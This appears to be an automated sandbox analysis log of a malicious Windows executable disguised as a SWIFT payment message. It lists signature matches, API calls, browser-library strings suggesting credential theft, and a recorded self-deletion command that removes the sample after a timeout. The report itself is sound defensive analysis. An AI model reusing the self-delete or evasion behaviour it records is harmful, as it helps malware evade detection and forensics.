Source: Swift Mesaj#U0131#09971.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B146D7 NtProtectVirtualMemory, 1_2_02B146D7
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B15868 NtResumeThread, 1_2_02B15868
Source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964990945.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015075705.000000001D464000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987008873.000000001DD28000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7972720642.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019677898.000000001E6D8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973542131.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8061396771.00000000018CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015896144.000000001E660000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988349897.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020557418.000000001E704000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019253907.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019860859.000000001E6E8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970112067.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll
Source: Swift Mesaj#U0131#09971.exe Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File read: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
